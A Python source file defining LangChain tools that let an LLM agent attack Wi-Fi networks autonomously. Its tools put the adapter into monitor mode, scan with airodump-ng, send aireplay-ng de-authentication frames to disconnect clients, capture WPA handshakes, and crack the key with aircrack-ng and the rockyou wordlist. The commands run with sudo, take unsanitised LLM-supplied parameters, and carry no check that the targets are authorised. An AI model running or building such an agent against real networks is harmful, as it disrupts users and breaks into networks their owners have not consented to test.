175 lines
7.4 KiB
Python
175 lines
7.4 KiB
Python
import json
|
|
import threading
|
|
import random
|
|
from langchain_core.pydantic_v1 import BaseModel, Field
|
|
from langchain.tools import tool
|
|
from langchain_community.tools import ShellTool
|
|
|
|
"""
|
|
All of my tools are built to run pre-defined shell tools in particular ways and generally just take CLI parameters as input.
|
|
I could have gave my agent 1 simple terminal tool, and a strong prompt mentioning the various kali applications used here and let it figure out the details.
|
|
|
|
That might have worked with a lot less code, but when done like this, we lessen the chance that a 'sudo' command goes rogue, and we also handle the needed multithreading case in python
|
|
"""
|
|
|
|
shell_tool = ShellTool()
|
|
|
|
|
|
"""
|
|
Crack password is a wrapper to run aircrack-ng and expects the LLM to provide the BSSID and packet capture file containing the handshake.
|
|
Some extra work could be done here to improve robustness including
|
|
1) Handle gracefully if the .cap does not actually contain a handshake
|
|
2) Take in a custom wordlist provided by the LLM
|
|
OR
|
|
3) Dynamically load one or more word list on the fly from the wordlist directory
|
|
4) Show some user feedback while cracking - this can take a while =/
|
|
"""
|
|
|
|
class CrackPassword(BaseModel):
|
|
json_params: str = Field(
|
|
description="""Should be a string of a json object containing
|
|
'bssid': the bssid of the network to crack.
|
|
'capfile': the path to the capture file containing the handshake. """
|
|
)
|
|
|
|
|
|
@tool(
|
|
"Perform wifi encryption cracking with aircrack-ng",
|
|
args_schema=CrackPassword,
|
|
return_direct=True,
|
|
)
|
|
def wifi_encryption_cracking(json_params: str) -> str:
|
|
"""Must pass bssid and capfile parameters (as a string containing a json object) to aircrack-ng to perform wifi encryption cracking"""
|
|
json_params = json_params.replace("\\", "")
|
|
json_obj = json.loads(json_params)
|
|
bssid = json_obj["bssid"]
|
|
cap = json_obj["capfile"]
|
|
|
|
res = shell_tool.run(
|
|
{
|
|
"commands": [f"aircrack-ng --bssid {bssid} -w wordlist/rockyou.txt {cap}"]
|
|
} # TODO: Abstrace out wordlist - allow custom/multiple wordlist files as long as they sit in the directory
|
|
)
|
|
return res
|
|
|
|
"""
|
|
This tool helps us run a combination of airodump-ng and aireplay-ng simultanously to de-auth and capture the handshake.
|
|
Because we must run these at the same time, we cannot just re-use the reconnaissance tool; instead we need this tool which runs each process in a seprate thread.
|
|
Overall this works ok assuming the client device choosing to re-connect after a de-auth, which you cannot always control.
|
|
"""
|
|
|
|
class DeauthAndCapture(BaseModel):
|
|
json_params: str = Field(
|
|
description="Should be a string of a json object containing 'bssid', 'channel', client' and 'interface' for the network BSSID, wif channel, de-auth client target id, and the wireless interface respectively"
|
|
)
|
|
|
|
|
|
@tool(
|
|
"Perform a de-auth and capture for a given wifi BSSID, channel, and client on the given wireless. All parameters must be identified first. Return the path to the handshake capture pcap file",
|
|
args_schema=DeauthAndCapture,
|
|
return_direct=False,
|
|
)
|
|
def deauth_and_capture(json_params: str) -> str:
|
|
"""Can pass bssid, client, channel, and interface parameters to aireplay-ng to perform and capture a de-auth. All parameters must be identified first"""
|
|
json_obj = json.loads(json_params)
|
|
|
|
bssid = json_obj["bssid"]
|
|
client = json_obj["client"]
|
|
interface = json_obj["interface"]
|
|
channel = json_obj["channel"]
|
|
hash = random.getrandbits(16)
|
|
|
|
out = f"dumps/deauth-capture-{hash}"
|
|
def run_airdump(channel, bssid, out, interface):
|
|
shell_tool.run(
|
|
{
|
|
"commands": [
|
|
f"sudo timeout -s SIGKILL 15 airodump-ng --band a --channel {channel} --bssid {bssid} --write {out} {interface}"
|
|
]
|
|
}
|
|
)
|
|
def run_aireplay(bssid, client, interface):
|
|
shell_tool.run(
|
|
{
|
|
"commands": [
|
|
f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}"
|
|
]
|
|
}
|
|
)
|
|
dumpthread = threading.Thread(
|
|
target=run_airdump, args=(channel, bssid, out, interface)
|
|
)
|
|
playthread = threading.Thread(target=run_aireplay, args=(bssid, client, interface))
|
|
dumpthread.start()
|
|
playthread.start()
|
|
dumpthread.join()
|
|
playthread.join()
|
|
return f"dumps/deauth-capture-{hash}-01.cap" # return path to the handshake capture fil;e
|
|
|
|
"""
|
|
This tools wraps airodump-ng. airodump is tricky to work with - it does not have any parameter to stop on its own so it needs a timing control,
|
|
and the SIGKILL is unfortunetly what it takes. It also does not do well with printing to stdout in this enviornment, so we must print to a dump file, and read the contents
|
|
of the dump file to get this tool to return what we are interested in. I looked into other approaches like 'iw scan', they had their own problems so we just stick with the aircrack suite
|
|
"""
|
|
class PacketCapture(BaseModel):
|
|
params: str = Field(
|
|
description="Should be the interface name on which to perform reconnaissance, followed by any optional command line flag parameters"
|
|
)
|
|
@tool(
|
|
"Perform wifi reconnaissance with airodump-ng. Interface must be in monitor mode before starting",
|
|
args_schema=PacketCapture,
|
|
return_direct=False,
|
|
)
|
|
def reconnaissance(params: str) -> str:
|
|
"""Use airodump-ng to gather wireless network information. Must take the interface as a parameter and may optionally be followed by command like flag parameters"""
|
|
hash = random.getrandbits(16)
|
|
res = shell_tool.run(
|
|
{
|
|
"commands": [
|
|
f"sudo timeout -s SIGKILL 30 airodump-ng --band a --output-format csv --write dumps/dump-{hash} {params} " # band a for 5Ghz - TODO: make it smart enough to figure out the band you want, or perhaps to ask
|
|
]
|
|
}
|
|
)
|
|
try:
|
|
with open(f"dumps/dump-{hash}-01.csv", "r") as file:
|
|
content = file.read()
|
|
file.close()
|
|
return content
|
|
except FileNotFoundError | Exception:
|
|
return "The file does not exist. Ensure interface is in monitor mode before using this tool"
|
|
|
|
|
|
"""
|
|
Straightfowrad tool wrapping airmon-ng
|
|
"""
|
|
class ChangeMonitorMode(BaseModel):
|
|
params: str = Field(
|
|
description="Should be command line parameters to 'airmon-ng' to change the state of a given wireless iterface mode."
|
|
)
|
|
@tool(
|
|
"Change the state of the wireless adapter mode with airmon-ng",
|
|
args_schema=ChangeMonitorMode,
|
|
return_direct=False,
|
|
)
|
|
def change_adapter_mode(params: str) -> str:
|
|
"""Can pass parameters to airmon-ng to change the mode of the wireless adapter"""
|
|
params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM
|
|
res = shell_tool.run({"commands": [f"sudo airmon-ng {params}", "sleep 5s"]}) # takes time, good idea to sleep
|
|
return res
|
|
|
|
|
|
"""
|
|
Straightfowrad tool wrapping iwconfig
|
|
"""
|
|
class Iwconfig(BaseModel):
|
|
params: str = Field(
|
|
description="should be command line parameters to 'iwconfig'. If none are needed, this should be left as an empty string"
|
|
)
|
|
@tool("Get interface information", args_schema=Iwconfig, return_direct=False)
|
|
def get_wireless_interface(params: str) -> str:
|
|
"""Return wireless interface information via iwconfig"""
|
|
params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM
|
|
print("params ", params)
|
|
res = shell_tool.run({"commands": [f"iwconfig {params}"]})
|
|
return res
|